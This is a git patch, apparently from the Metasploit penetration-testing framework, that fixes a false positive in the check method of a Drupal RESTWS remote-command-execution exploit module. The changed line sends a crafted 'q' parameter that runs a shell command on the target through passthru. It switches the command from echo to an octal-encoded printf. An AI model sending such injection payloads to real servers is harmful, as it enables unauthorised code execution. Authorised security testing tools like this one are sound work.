From c6b309d5c9ef98e332f9419fc76712deeb461f9a Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 20 Jul 2016 23:28:49 -0500 Subject: [PATCH] Fix drupal_restws_exec check method false positive --- modules/exploits/unix/webapp/drupal_restws_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/drupal_restws_exec.rb b/modules/exploits/unix/webapp/drupal_restws_exec.rb index 14e1524252..4751b8e27d 100644 --- a/modules/exploits/unix/webapp/drupal_restws_exec.rb +++ b/modules/exploits/unix/webapp/drupal_restws_exec.rb @@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { - 'q' => "taxonomy_vocabulary//passthru/echo #{r}" + 'q' => "taxonomy_vocabulary//passthru/printf #{Rex::Text.to_octal(r, '\\\\')}" } ) if res && res.body.include?(r)